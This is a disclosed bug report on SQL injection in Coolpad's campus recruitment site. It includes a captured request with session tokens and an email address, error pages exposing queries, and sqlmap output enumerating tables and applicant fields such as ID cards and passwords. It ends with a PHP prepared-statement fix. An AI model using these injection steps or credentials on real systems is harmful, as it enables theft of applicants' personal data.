2015-07-14: Details sent to the vendor; awaiting vendor handling
2015-07-14: Vendor confirmed; details disclosed to the vendor only
2015-07-24: Details disclosed to core white hats and experts in the relevant field
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public
Mobile industry security: Yulong Communication (Coolpad) SQL injection 》》》 Can I get a high rank??
http://campus.coolpad.com/
0x00
Packet capture
POST /index.php?c=submitResumes&f=addResumeStep01Create HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 335
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=addResumeStep01&pcode=dA==&forceEdit=yes
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; 

datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%225f88781d8c45102cc44bcad7728b64f9%22%7D%7Dprotocol=on&temp%5Bfield_id%5D=dA%3D%3D&temp%5Bfield_position_name%5D=%E9%85%B7%E6%B4%BE%E7%B2%BE%E8%8B%B1%E4%BF%B1%E4%B9%90%E9%83%A8%E9%AA%A8%E5%B9%B2%E6%88%90%E5%91%98&temp%5Bfield_city%5D=%E5%85%A8%E5%9B%BD&temp%5Bfield_allocatable%5D=0&temp%5Bfield_expect_city1%5D=%E5%8C%97%E4%BA%AC&temp%5Bfield_expect_city2%5D=%E5%8C%97%E4%BA%AC
Parameter temp%5Bfield_position_name%5D is injectable
Response
HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 09:03:30 GMT
Server: nginx/1.6.0
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 786

<strong>A mysql error has occurred!</strong><br />
<strong>Error Number:</strong>1064<br />
<strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå'' , `sa_city`='å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京' , `sa_edit_date`='2015-07-13 17:03:29' , `sa_save_date`='2015-07-13 17:03:29' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2' at line 1<br />
<strong>Error Time:</strong>2015-07-13 17:03:29
Parameter temp%5Bfield_city%5D is injectable
HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 09:04:21 GMT
Server: nginx/1.6.0
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 786

<strong>A mysql error has occurred!</strong><br />
<strong>Error Number:</strong>1064<br />
<strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå' , `sa_city`='å ¨å½'' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京' , `sa_edit_date`='2015-07-13 17:04:20' , `sa_save_date`='2015-07-13 17:04:20' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京' , `sa_edit_date`=' at line 1<br />
<strong>Error Time:</strong>2015-07-13 17:04:20
Parameter temp%5Bfield_expect_city1%5D is injectable
HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 09:06:18 GMT
Server: nginx/1.6.0
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 786

<strong>A mysql error has occurred!</strong><br />
<strong>Error Number:</strong>1064<br />
<strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå' , `sa_city`='å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京'' , `sa_expect_city2`='å京' , `sa_edit_date`='2015-07-13 17:06:17' , `sa_save_date`='2015-07-13 17:06:17' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'å京' , `sa_edit_date`='2015-07-13 17:06:17' , `sa_save_date`='2015-07-13 17:0' at line 1<br />
<strong>Error Time:</strong>2015-07-13 17:06:17
Parameter temp%5Bfield_expect_city2%5D is injectable
HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 09:06:51 GMT
Server: nginx/1.6.0
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 786

<strong>A mysql error has occurred!</strong><br />
<strong>Error Number:</strong>1064<br />
<strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå' , `sa_city`='å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京'' , `sa_edit_date`='2015-07-13 17:06:50' , `sa_save_date`='2015-07-13 17:06:50' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2015-07-13 17:06:50' , `sa_save_date`='2015-07-13 17:06:50' , `s_id`='32564674' ' at line 1<br />
<strong>Error Time:</strong>2015-07-13 17:06:50
Throw the request into sqlmap and try it, marking the injection point with *!
Database: coolpadjobdb
[35 tables]
+---------------------------------+
| clp_college                     |
| clp_college_department          |
| clp_count_position              |
| clp_department                  |
| clp_department_managers         |
| clp_hiring                      |
| clp_hiring_employ               |
| clp_hiring_first                |
| clp_hiring_second               |
| clp_lecture                     |
| clp_managers                    |
| clp_managers_area               |
| clp_position                    |
| clp_position_city               |
| clp_position_interviewarea      |
| clp_position_type               |
| clp_position_workarea           |
| clp_preach_plan                 |
| clp_province                    |
| clp_ranks                       |
| clp_recruit_area                |
| clp_recruitment_dynamics        |
| clp_seekers                     |
| clp_seekers_active              |
| clp_seekers_audition            |
| clp_seekers_behave              |
| clp_seekers_connection          |
| clp_seekers_education           |
| clp_seekers_family_relationship |
| clp_seekers_practice_experience |
| clp_seekers_project_experience  |
| clp_seekers_self_evaluation     |
| clp_seekers_skills_hobbies      |
| statistics_datas                |
| statistics_status               |
+---------------------------------+
Database: coolpadjobdb
Table: clp_seekers
[38 columns]
+----------------------------+------------------------------------------------------------------------+
| Column                     | Type                                                                   |
+----------------------------+------------------------------------------------------------------------+
| coolyun_uid                | int(9)                                                                 |
| s_address                  | varchar(420)                                                           |
| s_before_colloge_residence | varchar(45)                                                            |
| s_birthday                 | timestamp                                                              |
| s_card_type                | enum('idcard','other')                                                 |
| s_edit_date                | datetime                                                               |
| s_email                    | varchar(24)                                                            |
| s_emergency_contact        | varchar(72)                                                            |
| s_emergency_contact_tel    | varchar(18)                                                            |
| s_emergency_number         | varchar(42)                                                            |
| s_eng_rank_goal            | varchar(12)                                                            |
| s_eng_rank_type            | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_expect_graduation        | timestamp                                                              |
| s_graduation_time          | datetime                                                               |
| s_health                   | enum('better','nice','bad')                                            |
| s_height                   | int(4)                                                                 |
| s_iconb                    | varchar(420)                                                           |
| s_icons                    | varchar(420)                                                           |
| s_id                       | int(8)                                                                 |
| s_idcard                   | varchar(20)                                                            |
| s_living_city              | varchar(45)                                                            |
| s_marital_status           | enum('married','unmarried','divorce','secret')                         |
| s_name                     | varchar(72)                                                            |
| s_nation                   | varchar(32)                                                            |
| s_origin_palce             | varchar(128)                                                           |
| s_other_eng_rank_goal      | varchar(12)                                                            |
| s_other_eng_rank_type      | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_other_lang_rank          | varchar(300)                                                           |
| s_password                 | varchar(32)                                                            |
| s_photo                    | varchar(300)                                                           |
| s_political_status         | enum('members','party','other')                                        |
| s_portrait                 | varchar(360)                                                           |
| s_realname                 | varchar(24)                                                            |
| s_save_date                | datetime                                                               |
| s_sex                      | enum('lady','gentleman')                                               |
| s_tel                      | varchar(18)                                                            |
| s_wechat                   | varchar(24)                                                            |
| s_weight                   | int(4)                                                                 |
+----------------------------+------------------------------------------------------------------------+
available databases [3]:
[*] coolpadjobdb
[*] information_schema
[*] test
It's still that same database; I just want a high rank.
I just want a high rank.
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-07-14 14:20
Duplicate submission of an issue of the same nature. Thank you very much for your attention to Coolpad security.
None
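The UPDATE statement echoed in the error pages shows the defect class: four request fields are pasted straight into SQL string literals, and when the statement fails the whole query plus the MySQL message is written into the HTTP response. The following PHP is an added example, not Coolpad's code, showing that pattern next to a hardened version built on PDO prepared statements. The table and column names are the ones visible in the error page; the function names, the DSN and credentials, and the idea that the seeker id comes from the session are assumptions.

```php
<?php
// Added example, not Coolpad's code. Table and column names are those echoed
// in the report's error page; function names, DSN and credentials are
// assumptions / placeholders.

// Vulnerable pattern implied by the error page: request values are pasted
// into the string literals of an UPDATE, and on failure the whole statement
// plus the MySQL message is written into the HTTP response.
function updateAuditionUnsafe(mysqli $db, int $sid, int $pid, array $temp): bool
{
    $sql = "UPDATE `clp_seekers_audition` SET "
         . "`sa_position_name`='" . $temp['field_position_name'] . "', "
         . "`sa_city`='" . $temp['field_city'] . "', "
         . "`sa_expect_city1`='" . $temp['field_expect_city1'] . "', "
         . "`sa_expect_city2`='" . $temp['field_expect_city2'] . "' "
         . "WHERE `s_id`=$sid AND `p_id`=$pid";
    if ($db->query($sql) === false) {
        // This is the behaviour the report captured: query text leaks to the client.
        echo '<strong>A mysql error has occurred!</strong> SQL: ' . $sql . ' ' . $db->error;
        return false;
    }
    return true;
}

// Hardened form: every value travels as a bound parameter, so a quote in
// field_city is data rather than syntax; the row is selected by the session
// user's id rather than a uid carried in the request body; and the database
// error is logged server-side while the client only sees a failed result.
function updateAudition(PDO $db, int $sessionSid, int $pid, array $temp): bool
{
    $fields = ['field_position_name', 'field_city', 'field_expect_city1', 'field_expect_city2'];
    foreach ($fields as $f) {
        if (!isset($temp[$f]) || !is_string($temp[$f]) || mb_strlen($temp[$f]) > 200) {
            return false;           // reject malformed input rather than repairing it
        }
    }
    $stmt = $db->prepare(
        'UPDATE `clp_seekers_audition` '
        . 'SET `sa_position_name` = :pos, `sa_city` = :city, '
        . '`sa_expect_city1` = :c1, `sa_expect_city2` = :c2, '
        . '`sa_edit_date` = NOW(), `sa_save_date` = NOW() '
        . 'WHERE `s_id` = :sid AND `p_id` = :pid'
    );
    $stmt->bindValue(':pos',  $temp['field_position_name'], PDO::PARAM_STR);
    $stmt->bindValue(':city', $temp['field_city'],          PDO::PARAM_STR);
    $stmt->bindValue(':c1',   $temp['field_expect_city1'],  PDO::PARAM_STR);
    $stmt->bindValue(':c2',   $temp['field_expect_city2'],  PDO::PARAM_STR);
    $stmt->bindValue(':sid',  $sessionSid, PDO::PARAM_INT);
    $stmt->bindValue(':pid',  $pid,        PDO::PARAM_INT);
    try {
        return $stmt->execute();
    } catch (PDOException $e) {
        error_log('clp_seekers_audition update failed: ' . $e->getMessage());
        return false;
    }
}

// Connection settings the hardened form relies on: native (not emulated)
// prepares, exceptions on error, and an explicit connection charset so
// multibyte values are stored intact. Credentials are placeholders.
function connectJobDb(): PDO
{
    return new PDO(
        'mysql:host=127.0.0.1;dbname=coolpadjobdb;charset=utf8mb4',
        'DB_USER_PLACEHOLDER',
        'DB_PASSWORD_PLACEHOLDER',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
}

// Usage (assumes a logged-in session that holds the seeker's s_id):
// $ok = updateAudition(connectJobDb(), (int) $_SESSION['s_id'], 1, $_POST['temp']);
```

Two points in the hardened version matter beyond the bind calls. First, `s_id` is taken from the session, not from the `uid` inside the request's `datas` blob, so a user cannot edit another seeker's audition row even with a correct query. Second, the error handling returns `false` and logs; the captured responses show that echoing the statement is what handed the reporter the table and column names that sqlmap later confirmed.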